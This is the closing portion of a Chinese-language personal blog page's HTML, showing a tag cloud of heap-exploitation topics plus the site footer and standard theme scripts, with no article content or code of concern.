class="tags has-addons" href="/tags/tcache-stash-unlink/"><span class="tag">tcache stash unlink</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/template/"><span class="tag">template</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/top-chunk/"><span class="tag">top chunk</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/uaf/"><span class="tag">uaf</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/unlink/"><span class="tag">unlink</span><span class="tag">6</span></a></div><div class="control"><a class="tags has-addons" href="/tags/unsorted-bin-attack/"><span class="tag">unsorted bin attack</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/vm/"><span class="tag">vm</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/windows-terminal/"><span class="tag">windows terminal</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E4%BE%A7%E4%BF%A1%E9%81%93/"><span class="tag">侧信道</span><span class="tag">1</span></a></div></div></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="Lynne&#039;s House" height="28"></a><p class="is-size-7"><span>&copy; 2021 Roderick Chan</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客, <span id="busuanzi_value_site_pv">0</span>次访问</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/RoderickChan"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/cookieconsent/3.1.1/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/x-mathjax-config">MathJax.Hub.Config({
            'HTML-CSS': {
                matchFontHeight: false
            },
            SVG: {
                matchFontHeight: false
            },
            CommonHTML: {
                matchFontHeight: false
            },
            tex2jax: {
                inlineMath: [
                    ['$','$'],
                    ['\\(','\\)']
                ]
            }
        });</script><script src="https://cdnjs.loli.net/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" defer></script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>